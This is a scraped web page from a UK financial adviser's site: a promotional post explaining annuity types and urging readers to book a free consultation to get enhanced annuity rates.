id=\"header\"/></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										What Are The Best Annuity Rates in The UK										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/annuities/\" title=\"Annuities\">Annuities</a></li><li>What Are The Best Annuity Rates in The UK</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"\" style=\"float:right;\">&#13;\n										<div id=\"post-2325\" class=\"post-2325 post type-post status-publish format-standard has-post-thumbnail hentry category-annuities tag-best-annuity-rates post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">What Are The Best Annuity Rates in The UK</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1><a href=\"#\"/>Annuities –  Get the Best Annuity Rates &amp; Quotes</h1>&#13;\n<p>Powerful reasons to shop around for your best annuity rates</p>&#13;\n<p>Reading Time 6 Minutes</p>&#13;\n<p style=\"text-align: justify;\"><big><big><b>By the time you reach your retirement, you may think you have all the experience you need. You’ve been there, seen it all – and worked hard to ensure a long and happy retirement.</b></big></big></p>&#13;\n<p style=\"text-align: justify;\"><big>No doubt life will have taught you many lessons along the way. You know it’s vital that your future and the future of those that you love is secure. You know you need to get the best deal when it comes to managing your finances. <b>Experience has taught you that you need experience! </b></big></p>&#13;\n<p style=\"text-align: justify;\"><big>Buying an annuity is a crucial step to take. There is a wealth of choices out there for you – and at first it may appear daunting. You may think that the company with which you build up your pension fund will automatically offer you the best rate, and jump for the first annuity option that they offer to you.</big></p>&#13;\n<p style=\"text-align: justify;\"><big><b>Don’t do it.</b> Annuity rates have been on a downward spiral for years with over 40% of retirees finding themselves short-changed out of thousands of pounds. By receiving specialist advice, you could save yourself a huge sum and ensure that the money that you worked so hard for goes exactly where it’s meant to – <b>to you and those that you love</b>.</big></p>&#13;\n<div class=\"wpb_alert wpb_content_element wpb_alert-success\">&#13;\n	<div class=\"messagebox_text\"><p style=\"text-align: justify;\" align=\"center\"><big><b>But what is an annuity? And why would I want one?</b></big></p>&#13;\n<p style=\"text-align: justify;\" align=\"center\"><big><b><i>An annuity is a little like a wage in your retirement.</i></b></big></p>&#13;\n<p style=\"text-align: justify;\"><big>When you finish work you have to convert the capital that you have built up in your personal pension policy into a regular pension. Firstly, you can take up to 25% of your pension pot as a tax-free lump sum. The rest can then be used to buy an annuity – a regular income throughout your retirement.</big></p>&#13;\n<p style=\"text-align: justify;\" align=\"center\"><big><b><i>It effectively replaces the income you received when you worked.</i></b></big></p>&#13;\n<p style=\"text-align: justify;\"><big>If your annuity is planned for and managed properly, the transition from work to retirement will be a seamless journey for you and those that you provide for – <b>exactly as it should be</b>.</big></p>&#13;\n</div>&#13;\n</div>&#13;\n&#13;\n&#13;\n<p style=\"text-align: justify;\"><big><b>Choices, choices…</b></big></p>&#13;\n<p style=\"text-align: justify;\"><big>Depending on your circumstances and needs, there is much to choose from.</big></p>&#13;\n<ol><li><big>A <b>conventional annuity</b> (often called a ‘<b>lifetime</b>’ or ‘<b>standard</b>’ annuity in the UK) is a popular choice – primarily because you know from the outset exactly how much income you will receive a year.</big></li>&#13;\n<li><b><big>Fixed term (temporary) annuities </big></b><big>provide you with guaranteed income payments over a number of years.</big></li>&#13;\n<li><b><big>Variable annuities</big></b> <big>(or ‘</big><b><big>investment linked annuities</big></b><big>’) </big><big>give you the chance to increase your retirement income if you’re prepared to link it to the volatility of investments.</big></li>&#13;\n<li><big>However an <b>enhanced annuity</b> is more of a personal package, tailored specifically to you. It takes into account detailed information about your health and lifestyle. This specialised annuity can result in an increase of up to 40% in your retirement income.</big></li>&#13;\n</ol><p style=\"text-align: justify;\"><b><i><big>With all these choices on offer, you need a respected and experienced advisor to help guide you towards making the right decision. It’s the difference between being well-off or worse-off in your retirement. </big></i></b></p>&#13;\n<p style=\"text-align: justify;\"><b><big>An enhanced retirement means an enhanced lifestyle</big></b></p>&#13;\n<p style=\"text-align: justify;\"><big>It may seem hard to believe, but a staggering 125,000 pensioners collectively miss out on £250 million in extra retirement income each year* – purely through not seeking the correct financial advice. 70% of retirees are likely to qualify for an Enhanced Annuity Income – but only 10% of annuity buyers follow through with this option. Yet if you didn’t know about the benefits or the amount of money that you could save and receive – then why would you?</big></p>&#13;\n<p style=\"text-align: justify;\"><big>And not only that, but not seeking the right advice has led too many retirees into wrongly believing that declaring their full medical circumstances will result in a negative outcome. It’s simply not the case!</big></p>&#13;\n<p style=\"text-align: justify;\"><i>*Source: Association of British Insurers</i></p>&#13;\n<div class=\"wpb_alert wpb_content_element wpb_alert-success\">&#13;\n	<div class=\"messagebox_text\"><p style=\"text-align: justify;\" align=\"center\"><b><big>With an enhanced annuity, full disclosure of your medical circumstances can improve your retirement income.</big></b></p>&#13;\n<ul style=\"text-align: justify;\"><li><big>Common conditions such as asthma, diabetes, smoking, obesity, heart attack and even snoring can increase your retirement income by 21%.</big></li>&#13;\n<li><big>If you are very seriously ill, you could get more than a 20% uplift.</big></li>&#13;\n<li><big>If you suffer from high blood pressure or high cholesterol, you could see 7% more income than from a good health annuity.</big></li>&#13;\n</ul><p style=\"text-align: justify;\" align=\"center\"><b><i><big>But only if you take the right advice from a trusted, reliable and experienced advisor.</big></i></b></p>&#13;\n</div>&#13;\n</div>&#13;\n&#13;\n&#13;\n<p style=\"text-align: justify;\"><b><big>So. Who can help me increase my annuity income?</big></b></p>&#13;\n<p><b><big>Equity SMART can. And not only that, but we could boost it by 40%.</big></b></p>&#13;\n<p><big>We’ve got the experience and results to prove it. And as an independent firm we can achieve higher rates while selecting from providers across the whole of the market. All we need to get the ball rolling is to have a little chat with you.</big></p>&#13;\n<ul><li><big>We’ll review your health and lifestyle to build an accurate picture of your circumstances.</big></li>&#13;\n<li><big>With that information, we can assess your options and find the best annuity rates and packages to suit you.</big></li>&#13;\n<li><big>We’ll put together a free comparison report, to help you on your way.</big></li>&#13;\n</ul><p><big>It’s all so simple. To book a chat with our annuities expert, click the link below. It shouldn’t take you more than 20 minutes – and it’s free and totally non-obligational.</big></p>&#13;\n<p><big>We respect your time – we know how precious it is. Whether or not you choose to go with one of our packages to boost your retirement income is entirely up to you – but we think you’ll like what you hear.</big></p>&#13;\n<p><big>We’re committed to improving your future prospects so that your retirement can be every bit as happy, enjoyable and fulfilling as you’d always hoped it would be.</big></p>&#13;\n<p><b><big>Choose the right annuity. Choose Equity SMART.</big></b></p>&#13;\n<p><big>Warmest Regards</big></p>&#13;\n<p><big>Sam</big></p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>Click for Best Annuity Rates</h2><p>Would you like FREE advice about your annuity options?</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n<p> </p>&#13;\n<p><em>“There are a number of annuity options to choose from. we will ensure that you select the right one, suited to your needs and circumstances”</em></p>&#13;\n<p><em>“An enhanced annuity can dramatically improve your level of retirement income if you’re honest, upfront and thorough when disclosing your medical history”</em></p>&#13;\n<p><em>“A friendly chat with our annuities expert will only take around 20 minutes. It’s free and non-obligational, but could set you on the way to a retirement income boost”</em></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/sallyannhunt/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/annuities/\" title=\"View all posts in Annuities\" rel=\"category tag\">Annuities</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: <a href=\"../tag/best-annuity-rates/\" rel=\"tag\">Best Annuity Rates</a></span><span class=\"sep\">|</span><a href=\"../best-annuity-rates/\" title=\"Comment on What Are The Best Annuity Rates in The UK\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/best-annuity-rates/&amp;p[title]=What%20Are%20The%20Best%20Annuity%20Rates%20in%20The%20UK\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=What+Are+The+Best+Annuity+Rates+in+The+UK%20http://www.equalitywalk.org.uk/best-annuity-rates/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/best-annuity-rates/&amp;title=What%20Are%20The%20Best%20Annuity%20Rates%20in%20The%20UK\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/best-annuity-rates/&amp;title=What%20Are%20The%20Best%20Annuity%20Rates%20in%20The%20UK\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fbest-annuity-rates%2F&amp;name=What+Are+The+Best+Annuity+Rates+in+The+UK&amp;description=ANNUITIES+%E2%80%93+5+Powerful+reasons+to+shop+around+for+your+best+annuity+rates.++By+the+time+you+reach+your+retirement%2C+you+may+think+you+have+all+the+experience+you+need.+You%E2%80%99ve+been+there%2C+seen+it+all+%E2%80%93+and+worked+hard+to+ensure+a+long+and+happy+retirement+...\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/best-annuity-rates/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=What Are The Best Annuity Rates in The UK&amp;body=http://www.equalitywalk.org.uk/best-annuity-rates/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/sallyannhunt/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../best-annuity-rates/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"2325\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"10cb856da7\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"157\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:left;\">&#13;\n	<div id=\"text-15\" class=\"widget widget_text\">			<div class=\"textwidget\"><p><b>FAST FACTS</b> </p>&#13;\n<p>#1 Annuities give you regular income when you’re retired.</p>&#13;\n<p>#2 They can ease the transition from work to retirement</p>&#13;\n<p>#3  An enhanced annuity can give you 40% more retirement income</p>&#13;\n<p>#4 125,000 retirees a year are missing out due to bad annuity advice</p>&#13;\n<p>#5 Equity SMART can select the right annuity for you and your needs</p>&#13;\n</div>&#13;\n		</div>		<div id=\"recent-posts-6\" class=\"widget widget_recent_entries\">		<div class=\"heading\"><p>Recent Posts</p></div>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n				</ul></div><div id=\"categories-5\" class=\"widget widget_categories\"><div class=\"heading\"><p>Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (4)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (8)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"iphorm-widget-4\" class=\"widget iphorm-widget\"><div id=\"iphorm-outer-5393b6fc3e20f\" class=\"iphorm-outer iphorm-outer-12 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-5393b6fc3e20f\').iPhorm({\"id\":12,\"uniqueId\":\"5393b6fc3e20f\",\"PHPSESSID\":\"7ab6fa7a688c82eee37da328db5dc219\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    });\r\n	]]></script><form id=\"iphorm-5393b6fc3e20f\" class=\"iphorm iphorm-form-12\" action=\"../best-annuity-rates/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-12\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"12\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"5393b6fc3e20f\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/best-annuity-rates/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"2325\"/><input type=\"hidden\" name=\"post_title\" value=\"What Are The Best Annuity Rates in The UK\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\">For expert impartial advice and a FREE consultation with no obligation fill out the short form below.&#13;\n&#13;\n</p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-12 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_12_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_12_1-element-spacer\">&#13;\n                    <label for=\"iphorm_12_1_5393b6fc3e20f\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_12_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_12_1\" id=\"iphorm_12_1_5393b6fc3e20f\" type=\"text\" name=\"iphorm_12_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_12_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_12_5-element-spacer\">&#13;\n                    <label for=\"iphorm_12_5_5393b6fc3e20f\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_12_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_12_5\" id=\"iphorm_12_5_5393b6fc3e20f\" type=\"text\" name=\"iphorm_12_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_12_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_12_2-element-spacer\">&#13;\n                    <label for=\"iphorm_12_2_5393b6fc3e20f\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_12_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_12_2\" id=\"iphorm_12_2_5393b6fc3e20f\" type=\"text\" name=\"iphorm_12_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-select iphorm_12_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-select iphorm_12_11-element-spacer\">&#13;\n                    <label for=\"iphorm_12_11_5393b6fc3e20f\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-select iphorm_12_11-input-wrap\">&#13;\n            <select class=\"iphorm-element-select  iphorm_12_11\" name=\"iphorm_12_11\" id=\"iphorm_12_11_5393b6fc3e20f\"><option value=\"Pensions\">Pensions</option><option value=\"Insurance\">Insurance</option><option value=\"Trusts\">Trusts</option><option value=\"Investments\">Investments</option><option value=\"Wealth Management\">Wealth Management</option><option value=\"Other\">Other</option></select></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_12_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_12_10-element-spacer\">&#13;\n                    <label for=\"iphorm_12_10_5393b6fc3e20f\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_12_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_12_10\" id=\"iphorm_12_10_5393b6fc3e20f\" name=\"iphorm_12_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_12_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-12 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-12\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\" style=\"font-size: 18px;\"><span style=\"padding-top: 15px;padding-bottom: 15px;padding-right: 10px;padding-left: 27px;\"><em>Get Advice</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-5393b6fc3e20f script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* 